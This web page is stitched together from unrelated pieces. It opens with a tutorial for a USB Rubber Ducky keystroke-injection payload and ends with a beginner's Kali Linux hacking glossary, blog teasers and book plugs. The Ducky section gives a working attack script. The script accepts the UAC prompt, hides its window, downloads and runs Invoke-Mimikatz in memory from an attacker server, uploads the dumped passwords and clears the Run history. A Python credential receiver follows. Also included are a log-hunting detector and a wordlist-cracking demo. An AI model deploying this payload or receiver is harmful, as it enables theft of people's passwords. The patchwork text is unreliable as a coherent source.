Pilfering Passwords with the USB Rubber Ducky

Can you social engineer your target into plugging in a USB drive? How about distracting them for the briefest of moments?

15 seconds of physical access and a USB Rubber Ducky is all it takes to swipe passwords from an unattended PC. In honor of its appearance on a recent episode, we're recreating this Hollywood hack and showing how easy it is to deploy malware and exfiltrate data using this Hak5 tool.

The USB Rubber Ducky is the original keystroke injection attack tool. While it looks like a USB drive, it acts like a keyboard, typing over 1000 words per minute. Specially crafted payloads like this one mimic a trusted user, entering keystrokes into the computer at superhuman speed.

Once developed, anyone with social engineering or physical access skills can deploy these payloads with ease. Since computers trust humans, and inherently keyboards, computers trust the USB Rubber Ducky. So let's go violate this trust.

The payload in question here uses a variant of mimikatz, the tool by Gentilkiwi that can dump cleartext passwords from memory. The variant by Clymb3r, Invoke-Mimikatz, reflectively injects mimikatz into memory using PowerShell, so mimikatz never touches the computer's hard disk. Using an altered method by Mubix, the PowerShell script is pulled directly from your server and executed in memory.

Once deployed this payload will open an admin command prompt, accept the UAC consent prompt, obfuscate the window, download and execute Invoke-Mimikatz from your server, then upload the resulting cleartext passwords and other credentials back to your server. When it's all said and done you'll go from plug to pwned in about 15 seconds.

Two caveats before you build it. The payload does not bypass UAC; it accepts the consent prompt with keystrokes, so the logged-in user must already be a local administrator (a standard user gets a credential prompt instead, and the payload stalls there). And because the script runs in memory rather than from disk, it only sidesteps file-based antivirus: process-creation and PowerShell logging still record every command typed, and a Windows build with LSA Protection or Credential Guard enabled will not hand over cleartext passwords this way.

What you'll need

To pull off this attack you'll need:

- Any web server on the Internet with PHP (preferably something mostly anonymous)
- A USB Rubber Ducky
- This ducky script payload
- This Invoke-Mimikatz PowerShell file
- This credential saving PHP script

Step 1: Writing the Payload

USB Rubber Ducky payloads are written in Ducky Script, a ridiculously simple scripting language that can be written in any ordinary text editor, so fire up notepad, vi, emacs or the like.

Initial delay

    REM Title: Invoke mimikatz and send creds to remote server
    REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi
    DELAY 1000

The first command, REM, is just a comment. It's always good practice to comment your code. The second command, DELAY, tells the USB Rubber Ducky to pause for 1000 milliseconds.

This delay gives the target computer enough time to recognize the USB Rubber Ducky as a keyboard before it begins typing.

Open administrator command prompt

    REM Open an admin command prompt
    GUI r
    DELAY 500
    STRING powershell Start-Process cmd -Verb runAs
    ENTER
    DELAY 2000
    ALT y
    DELAY 1000

The above snippet opens an admin command prompt using the PowerShell method. GUI r is equivalent to holding down the Windows key and pressing R, which opens the Windows Run dialog. The -Verb runAs parameter of Start-Process starts the process with administrator permissions. This is the same as opening cmd with the Run as administrator option.

Once the PowerShell command is typed and Enter is pressed, a UAC consent dialog pops up. Keyboard input still reaches that dialog, so the payload accepts it by holding ALT and pressing Y for Yes. This only works when the logged-in user is a member of the local Administrators group; otherwise UAC asks for an administrator's credentials and the payload never gets its elevated prompt. The DELAY 2000 before ALT y matters too: if the consent dialog is slow to appear, the keystroke is lost and the prompt stays open, so tune that value for the slowest machine you expect to meet.

Voila, admin command prompt!

Obfuscate the command prompt

While not necessary, it's always nice to obfuscate the command prompt so as to bring as little attention to the attack as possible. Depending on your scenario this section may or may not be necessary.

    REM Obfuscate the command prompt
    STRING mode con:cols=18 lines=1
    ENTER
    STRING color FE
    ENTER

The first command, mode, shrinks the command prompt window to 18 columns by a single line, about as small as it will go. The second changes the color scheme to a difficult to read light yellow on white (the first hex digit, F, is the background, the second, E, the foreground).

The hope is that the tiny white window will blend in with the rest of the windows on the screen. Thankfully this payload is extremely short, so it'll only be open for a brief time.

Download and execute the payload

Now with our obfuscated admin command prompt open it's time to download the Invoke-Mimikatz payload into memory, execute it, and pass the resulting credentials back to our server. The URLs below are placeholders: replace YOUR-SERVER with your own web server, which hosts the Invoke-Mimikatz script and the rx.php receiver from Step 3.

    REM Download and execute Invoke Mimikatz then upload the results
    STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://YOUR-SERVER/Invoke-Mimikatz.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://YOUR-SERVER/rx.php', $output)"
    ENTER
    DELAY 15000

PowerShell's IEX (the alias for Invoke-Expression) executes the string that follows rather than just echoing it back to the command line. The DELAY 15000 at the end keeps the window open for 15 seconds while the download, dump and upload complete before the next keystrokes are typed.

The New-Object cmdlet creates an instance of a .NET Framework class, here System.Net.WebClient. Using the WebClient class we can send and receive data from standard web servers. Its DownloadString method downloads the resource, specified as a URL, as a string. In this case it's the Invoke-Mimikatz PowerShell script hosted on our web server, and because IEX executes that string directly, the Invoke-Mimikatz function is defined in the PowerShell session without ever being written to disk.

This is then executed with the -DumpCreds parameter. The resulting passwords and other credentials are saved in memory in the $output variable. Finally the UploadString method POSTs the credentials, stored in the $output variable, to the URL specified. In this case it's a PHP receiver script sitting on our web server ready to store the creds for our viewing pleasure. In this example I'm using my own web server, so be sure to change the URL to match your own.

Clearing your tracks

Once the Invoke-Mimikatz payload has executed and you've captured the credentials, you'll want to clear your tracks. Since cmd doesn't maintain a persistent command history, everything typed in the command prompt will be gone after the exit command is issued. The Run dialog on the other hand maintains a list of recently used commands in the Windows registry.

Let's clear it.

    REM Clear the Run history and exit
    STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
    ENTER
    STRING exit
    ENTER

The Remove-ItemProperty cmdlet deletes values from the Windows registry. In this case the asterisk (*) wildcard is used to delete all values under the RunMRU key, -ErrorAction SilentlyContinue keeps it quiet if the key is already empty, and exit closes our tiny command prompt window. Bear in mind that this only clears what the user would see in the Run dialog's drop-down: if the target audits process creation (Security event 4688 with command-line logging, or Sysmon event 1) or has PowerShell script block logging enabled (event 4104), every one of the commands above is already in the event log.

That's it, ducky script complete! Download a copy here and be sure to change the URL to that of your own web server.
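The flip side of the payload above is what a defender sees. The following is an added example, not part of the Hak5 write-up: a small Python hunt over process-creation records that flags the chain of commands this Ducky script types. It assumes you already collect command lines (Windows Security event 4688 with command-line logging enabled, or Sysmon event 1) and can hand them to Python as dicts; the SAMPLE_EVENTS, hostnames, user names and the 203.0.113.5 server address are constructed for the example.

```python
"""Hunt for the Ducky payload's command lines in process-creation logs.

Added example, not code from the original page. Assumes 4688/Sysmon records are
available as dicts with ts/host/user/cmdline; SAMPLE_EVENTS are constructed here.
"""
import re
from datetime import datetime, timedelta

# One regex per stage of the Ducky script, in the order the payload types them.
INDICATORS = [
    ("elevated-cmd-via-powershell", re.compile(r"start-process\s+cmd\s+-verb\s+runas", re.I)),
    ("shrunken-console", re.compile(r"\bmode(\.com)?\s+con:?\s*cols=\d{1,2}\s+lines=1", re.I)),
    ("download-cradle", re.compile(r"\b(iex|invoke-expression)\b.*downloadstring\(", re.I | re.S)),
    ("mimikatz-dump", re.compile(r"invoke-mimikatz\s+-dumpcreds", re.I)),
    ("runmru-wipe", re.compile(r"remove-itemproperty.*\\runmru", re.I)),
]

SAMPLE_EVENTS = [  # constructed: one process creation each, ISO timestamp + logged command line
    {"ts": "2017-03-25T10:00:00", "host": "WS01", "user": "alice",
     "cmdline": "powershell Start-Process cmd -Verb runAs"},
    {"ts": "2017-03-25T10:00:02", "host": "WS01", "user": "alice",
     "cmdline": "mode con:cols=18 lines=1"},
    {"ts": "2017-03-25T10:00:03", "host": "WS01", "user": "alice",
     "cmdline": "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/im.ps1'); "
                "$output = Invoke-Mimikatz -DumpCreds; "
                "(New-Object Net.WebClient).UploadString('http://203.0.113.5/rx.php', $output)\""},
    {"ts": "2017-03-25T10:00:19", "host": "WS01", "user": "alice",
     "cmdline": "powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\"
                "CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\""},
    # A lone elevation is what any admin does all day; it must not alert on its own.
    {"ts": "2017-03-25T11:30:00", "host": "WS02", "user": "bob",
     "cmdline": "powershell Start-Process cmd -Verb runAs"},
    {"ts": "2017-03-25T12:00:00", "host": "WS03", "user": "carol",
     "cmdline": "powershell Get-ChildItem C:\\Users"},
]


def stages_in(cmdline: str) -> list[str]:
    """Names of the payload stages one command line matches (usually zero or one)."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def hunt(events, window: timedelta = timedelta(seconds=60), min_stages: int = 2):
    """Return [(host, user, stages)] for each host/user session in which at least
    `min_stages` distinct stages occur within `window`. The whole payload runs in
    about 15 seconds, so a short window catches it while a single UAC elevation
    (one stage) stays quiet."""
    hits = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        names = stages_in(ev["cmdline"])
        if names:
            hits.setdefault((ev["host"], ev["user"]), []).append(
                (datetime.fromisoformat(ev["ts"]), names))
    alerts = []
    for (host, user), seq in hits.items():
        for i, (t0, _) in enumerate(seq):
            seen = set()
            for t, names in seq[i:]:
                if t - t0 > window:
                    break
                seen.update(names)
            if len(seen) >= min_stages:
                alerts.append((host, user, sorted(seen)))
                break  # one alert per session is enough
    return alerts


if __name__ == "__main__":
    for host, user, stages in hunt(SAMPLE_EVENTS):
        print(f"{host}/{user}: {', '.join(stages)}")
```

The point of correlating rather than matching single lines is that `Start-Process cmd -Verb runAs` on its own is ordinary administrator behaviour; it is the burst of elevation, download cradle, credential dump and RunMRU wipe from one user within seconds that is the Ducky's fingerprint.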

Step 2: Encoding the Payload

Now that the invoke-mimikatz.txt ducky script has been customized with your web server URL, you're ready to encode it. The USB Rubber Ducky expects an inject.bin file on the root of its microSD card. This file is the binary equivalent of the ducky script text file written in the previous step.

To convert the ducky script text file into an inject.bin binary, use the Duck Encoder:

    java -jar duckencode.jar -i invoke-mimikatz.txt -o inject.bin

The above command tells the duck encoder to take the input file, the invoke-mimikatz.txt ducky script, and convert it into the binary output file, inject.bin. Then it's just a matter of copying the inject.bin file to the root of a microSD card and plugging it into the USB Rubber Ducky.

Step 3: Setting up the Web Server

You'll need a web server to host the Invoke-Mimikatz PowerShell script, as well as a way to receive the credentials.

The rx.php script will save any POST data into individually time and date stamped .cred files, including the sending host's IP address. It goes without saying that HTTPS would be preferred in this instance: the credentials travel in the request body, so over plain HTTP anyone on the path, including the target's own proxy logs, can read them. See the Hak5 episode on setting up SSL on your web server for free. In addition to the rx.php script to receive the HTTP POST data from the target PC, you'll need to host the Invoke-Mimikatz PowerShell script. You can grab the latest version and save it to your web server.

Step 4: Deploying the Attack

Finally, with your web server hosting the Invoke-Mimikatz script and PHP credential receiver, you're ready to rock and roll! Pop the USB Rubber Ducky into its covert USB drive case and head out on your next physical engagement armed with this 15 second password nabbing payload!
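For readers without a PHP host, here is an added example of a receiver that does what the description of rx.php above says: each POST body lands in its own date/time-stamped .cred file tagged with the sender's IP. It is written in Python rather than PHP and is not the page's script; the file naming scheme, the port, and the sample mimikatz-style body are this example's own choices.

```python
"""Minimal stand-in for the rx.php credential receiver described on the page.

Added example (Python, not the page's PHP). Assumes WebClient.UploadString POSTs the
dump as the raw request body, which it does. SAMPLE_* values are constructed.
"""
import re
import tempfile
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from typing import Optional


def save_credentials(body: bytes, client_ip: str, outdir: Path,
                     when: Optional[datetime] = None) -> Path:
    """Write one .cred file named by timestamp and source address; return its path.
    The address is sanitised so a forged value can never escape `outdir`."""
    when = when or datetime.now(timezone.utc)
    safe_ip = re.sub(r"[^0-9a-fA-F.:]", "_", client_ip)
    name = f"{when.strftime('%Y-%m-%d_%H-%M-%S')}_{safe_ip}.cred"
    outdir.mkdir(parents=True, exist_ok=True)
    path = outdir / name
    path.write_bytes(f"# from {client_ip} at {when.isoformat()}\n".encode() + body)
    return path


class CredReceiver(BaseHTTPRequestHandler):
    """Accept POSTs from the payload; everything else gets a bare 404."""
    outdir = Path("creds")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length)
        save_credentials(body, self.client_address[0], self.outdir)
        self.send_response(200)
        self.end_headers()

    def do_GET(self):
        self.send_response(404)
        self.end_headers()

    def log_message(self, *args):  # stay quiet on the console
        pass


# Constructed sample so the storage path can be exercised without a network.
SAMPLE_TIME = datetime(2017, 3, 25, 10, 0, 19, tzinfo=timezone.utc)
SAMPLE_BODY = b"Username : alice\nDomain   : CORP\nPassword : hunter2\n"
SAMPLE_IP = "203.0.113.7"


def demo_receive(outdir: Optional[Path] = None) -> Path:
    """Store the constructed sample as the handler would and return the file written."""
    outdir = outdir or Path(tempfile.mkdtemp(prefix="creds-"))
    return save_credentials(SAMPLE_BODY, SAMPLE_IP, outdir, SAMPLE_TIME)


if __name__ == "__main__":
    print("wrote", demo_receive())
    HTTPServer(("0.0.0.0", 8080), CredReceiver).serve_forever()
```

Run it behind an HTTPS reverse proxy (or wrap the socket with ssl) rather than on bare port 8080 in practice; as the page notes, the upload otherwise crosses the network in cleartext.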

After installing Kali Linux successfully you will be looking for where to start learning it and how to use it. Everyone faces these problems, even me, but after covering these tutorials you will be able to make your own tutorials or understand every tutorial available on the Internet. You just need to follow these articles step by step.

Requirements:

- Internet connection
- Passion

OK, first of all read these hacking terms before moving on to the Kali Linux tutorials.

Hacking terms you must know

Phishing: basically, phishing is a way to hack online accounts (like Facebook, Gmail) by making a fake login page similar to the original login page. When you open a phishing page it looks like the original page; see this screenshot. You would think it is the original, but it is fake: look at the URL. The address bar is the real test. Most login sites use HTTPS (the s means the connection is encrypted), but a phishing site can have a valid certificate too, so the padlock alone does not prove you are on the genuine site.

The advanced versions of phishing are desktop phishing and tabnabbing.

Desktop Phishing: This is an advanced type of phishing. It works like the method above, but the URL is not replaced: the victim's computer itself is tampered with (typically its hosts file) so that when the real site's address is opened, the attacker's fake page loads while the address bar still shows the genuine domain. Modern browsers largely defeat this, because the attacker's server cannot present a valid HTTPS certificate for the real domain, and you need physical access to the victim's computer to set it up.

Search on Google if you need more info, but this is enough for beginners.

Tabnabbing: If you keep many tabs open while browsing the internet then your account can be hacked by this method. In this attack the victim clicks a link from another site. For example, you and I are friends on Facebook, and I send you a link in a Facebook message. When you open the link and then move on to two or three other tabs, the page you left behind rewrites itself to look like the Facebook login page.

You will think your account has been logged out automatically, log in again, and I will get your password while you are redirected to the real site.

Keylogger: this is software or hardware which records every key typed by the victim on the keyboard. Keyloggers are used for stealing credentials because, along with everything else, they record usernames and passwords. There are two types of keylogger.

Software keylogger: a program which records every keystroke. You can download a free keylogger from the internet or write your own if you have good programming knowledge.

Hardware keylogger: a device plugged in between the keyboard and the computer which records the keystrokes that pass through it. Nowadays hardware keyloggers are also planted on payment keypads to capture credit card details.

Brute force attack: Another way to get passwords. The attacker guesses the password length and the character set used, and software then generates every combination of those characters and tries each one as the password. It is a time-consuming method.

Wordlist attack: It is similar to the above, but here the attacker first generates a list of candidate words and saves them to a file using software like crunch (or takes a list of real leaked passwords). Another program then tries every word in the list as the password.

This attack is used in Wi-Fi cracking. The speed depends on the machine; the figure quoted here for aircrack-ng is 969 keys per second.

Encryption and hashing: A website must never store your password itself in its database. A well-built site stores a one-way hash of it, for example:

    Original password: This is a line
    Stored value: gfEDdWzoKboa9gTFLeb2D476vTg

Hashing is not encryption. An encrypted value can be decrypted by whoever holds the key; a hash cannot be reversed, so if a hacker steals the database they still have to guess each password and hash it to check. That is why a salted, slow hash plus a long password protects you even after a breach. If you are from India you know about Paytm. A "128-bit encryption" claim like Paytm's refers to the TLS connection between your browser and the site, not to how your password is stored; it does not make your password longer. A search space of 2^128 is what a random 128-bit key gives an attacker, not what a weak password gives them: a stored hash is only as strong as the password behind it.

Ransomware: It is a program written by a hacker which encrypts your whole hard disk (so nobody can open the data) and then asks for money if you want your data back. You can either format your hard disk and lose the data, or pay the hacker.

IP address: IP stands for Internet Protocol.
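To make the hashing, brute force and wordlist points above concrete, here is an added example (not from the original article) in Python: a salted, slow password hash of the kind a site should store, a verify function, and the wordlist attack an attacker runs against a stolen hash. The two accounts, their passwords and the wordlist are constructed for the example.

```python
"""Password storage versus password guessing. Added example, not the article's own code.
Accounts, passwords and the wordlist below are constructed."""
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 100_000  # PBKDF2-HMAC-SHA256 work factor: every guess costs this many SHA-256 rounds


def hash_password(password: str, salt: Optional[bytes] = None) -> tuple[bytes, bytes]:
    """Return (salt, digest). A fresh random salt per user means identical passwords hash
    differently, so one guess cannot be checked against every account at once."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute and compare in constant time. There is no key to decrypt with: the only
    way from the stored value back to the password is to guess it."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)


def wordlist_attack(salt: bytes, digest: bytes, wordlist: list[str]) -> Optional[str]:
    """What an attacker does with a stolen (salt, digest) pair and a crunch-style list:
    hash every candidate and compare. Returns the password if it is in the list."""
    for word in wordlist:
        if verify_password(word, salt, digest):
            return word
    return None


def brute_force_seconds(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Time to try every string of `length` characters over `alphabet_size` symbols at a
    given guess rate; the search space grows exponentially with length."""
    return alphabet_size ** length / guesses_per_second


# Constructed sample: one weak password that the wordlist contains, one long one it does not.
USERS = {
    "alice": hash_password("summer2017"),
    "bob": hash_password("correct horse battery staple 4711"),
}
WORDLIST = ["123456", "password", "qwerty", "summer2017", "letmein"]


def crack_all(users=USERS, wordlist=WORDLIST) -> dict:
    """Run the wordlist against every stored hash; unrecovered passwords map to None."""
    return {name: wordlist_attack(salt, digest, wordlist)
            for name, (salt, digest) in users.items()}


if __name__ == "__main__":
    print(crack_all())
    days = brute_force_seconds(26, 8, 969) / 86400
    print(f"8 lowercase letters at 969 guesses/s: about {days:.0f} days")
```

The two results side by side are the lesson: the salt and the 100,000 iterations make each guess slow, yet alice's password still falls to a five-word list, while bob's long passphrase survives because the attacker has nothing to decrypt and no list that contains it.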

It is the address of our device on the network. To find your public IP address, type "what is my IP" into Google. There are two types of IP address: I) public IP, II) private IP. We are connected to the internet through our public IP address.

It can be changed by using a VPN or a proxy.

VPN: VPN stands for virtual private network. A VPN basically changes the IP address that websites see. If you are using a VPN, the sites you visit cannot tell who you are, but the VPN company can, and a free VPN may well expose you if you do something seriously illegal. Here is how a VPN works.

Web Server: 90% of you know what a web server is, but if you don't, it is a computer where the files of a website are stored. For example, the image and text above are stored on a computer known as the web server.

DoS attack: it stands for Denial of Service.

It is mainly used to make a website slow or unavailable. Fake traffic is sent to the web server, and when it exceeds the bandwidth or the server's capacity, the server goes down. Here is a screenshot of a website when its server is down. The easiest way to protect against a DoS attack from a single source is a firewall rule which blocks traffic from that particular computer.

DDoS attack: it stands for Distributed Denial of Service.

In a DoS attack there is only one machine, but in a DDoS there are many attacking devices, as shown in the screenshot, so blocking one address no longer helps. The defence is again a filtering layer, but it works differently: a service with enough capacity in front of your server to absorb the flood. I am using the CloudFlare CDN for protecting against DDoS attacks. Source: gohacking.com

SQL injection: A DDoS attack takes the server down, but SQL injection lets you hack the website itself. The hacker types SQL into the website's input fields; if the application pastes that input straight into its database queries, the injected SQL is executed by the database.

Social engineering: It is not a technical hacking method.

It is hacking the person rather than the computer: tricking or persuading someone into handing over a password or access. Guessing someone's password from what you know about them is one small part of it. I am not an expert in this, and it takes a lot of time. It is different for each person, so it is very time-consuming.

Language you should learn for hacking

Python: Ask any hacker; every one of them will recommend Python. It is easy and powerful, and after completing a course you will be able to read or write Python. Besides hacking, Python also helps in data science. But Python alone does not let you hack everything: to hack websites you have to learn SQL injection and XSS, and before you search Google for "learn SQL injection", understand that it requires knowledge of SQL databases, PHP, JavaScript, CSS and HTML.

This is a long process.

Types of hacker: There are three types of hacker.

Black hat hacker: These hackers are criminals; they misuse their hacking knowledge.

White hat hacker: These hackers are ethical hackers; they use their knowledge to protect computers.

Gray hat hacker: This type of hacker sits between the two: they may break into systems without permission, but without the criminal intent of a black hat, and sometimes for money.

Kali Linux Hacking tutorials

Posted: March 25, 2017. Welcome to the second chapter. In this one we will discuss installing Kali Linux. If you don't know what Kali Linux is: it is an operating system used by hackers because it has all the software needed for hacking, and it is free and open source. Installing Kali Linux is somewhat complex for beginners; here is the full post on how to do it. You can dual boot it with Windows or install it inside Windows using virtualization. No more words, let's come to the point: how to dual boot with Kali.

Posted: March 25, 2017. I hope you have installed Kali Linux in VirtualBox or some other way. In this lesson I am talking about basic commands in Kali Linux, not all of them, only the ones you need when starting, plus a free source for learning all Linux commands. Before the commands, I want to introduce you to the terminal. The terminal is software like the command prompt available on the Windows operating system. Linux works on commands, and so does hacking. You can open the terminal from the sidebar as shown in the screenshot. Understanding the Linux directory layout is important. A directory means a folder; root is the main directory of Linux and it is denoted

Posted: March 25, 2017. In this lesson we will talk about how you can hide your identity, browse anonymously or change your IP address. There are several ways to hide or change your IP address in Kali Linux: using proxychains, or using a VPN. Make sure you visit the hacking for beginners post to know how proxies and VPNs work. With proxychains you change your IP address by chaining through as many proxies as you wish. Kali has a proxychains configuration file in which you have to enter your working proxies manually. Proxychains works in three ways. Static: the default; traffic goes through all the proxies in order. If

Posted: October 17, 2016. Nowadays we can't imagine our life without the internet, and Wi-Fi is the most popular way to connect. That's why "hack WiFi" is the most popular hacking query on Google Trends. In this post I am guiding you on how you can hack and secure your Wi-Fi. Here is the basic guide for beginners. I have listed working wireless network attack methods and the software for them. I always prefer the Kali Linux operating system for any hacking. Kali has all the tools needed for Wi-Fi hacking preinstalled, like aircrack-ng (the best software for cracking Wi-Fi). No doubt some software is also available for

Posted: March 25, 2017. In this post we will talk about the Metasploit Framework. I am sure you have heard enough about Metasploit and maybe are still confused about what it is and how to use it. It is a framework, meaning a collection of a number of tools. You can gather information, make malware, hack FTP, hack Android and many other things; you will learn as you use it. It comes preinstalled in Kali Linux and Parrot. It has paid and free versions; of course Kali has the free version. Not only in Kali, you can install it on Windows too. Metasploit is also integrated

Posted: April 16, 2018. For website hacking, SQL injection is very famous. In this article I will explain everything from scratch. Note: most visitors will not understand these tutorials if they don't have any patience. To understand SQL injection you should first know what SQL is. Well, SQL is the Structured Query Language, used for editing databases.

After reading all this you have some hacking skills; here are some PDFs about Kali Linux hacking which you should read.

Web Penetration Testing with Kali Linux: I like this book. It is a detailed guide to website hacking, from information gathering to exploiting. It covers not only Kali tools but also other tools, like websites for collecting information, which is helpful. All the attacks like SQL injection, XSS, exploiting server flaws, and authentication and hijacking techniques are described.


You can get it here or buy it from Amazon at $3.92.

Basic Security Testing with Kali Linux: For beginners, this is the best source. It will teach you from the start: Kali overview, Metasploit tutorials, information gathering, exploiting Windows and Linux, wireless attacks, password hacking techniques, security tips for your network, etc. Buy from Amazon.

Mastering Kali Linux for Advanced Penetration Testing: As is evident from the name, it is for masters. Physical security, social engineering, web services and attacking the network's end users directly are explained very well.

For those who want to make a career in IT security, it is the best book. Buy from Amazon.

Further steps to become a master in hacking

Get a paid video hacking course for free by sharing this post: if you share this post you will receive a video hacking course (original price $10). Believe me, it is one of the best courses at this price.

Networking: networking is an important part of hacking. On the internet thousands of blogs are available to learn networking. There is also a website for learning the use of any hacking tool; visit it daily and learn something new.


Websites you should visit: tool.kali.org does not provide hacking tutorials, so check out these websites; I advise you to visit them daily. Today this is the number one blog in the hacking/pen testing niche. I visit Null Byte daily; forums are also available there to ask questions. On GitHub you can find scripts in any language related to anything, like keylogging, etc. Now you know your path to become a pen tester. If you have any suggestions related to these Kali Linux tutorials then you can mention them in the comments.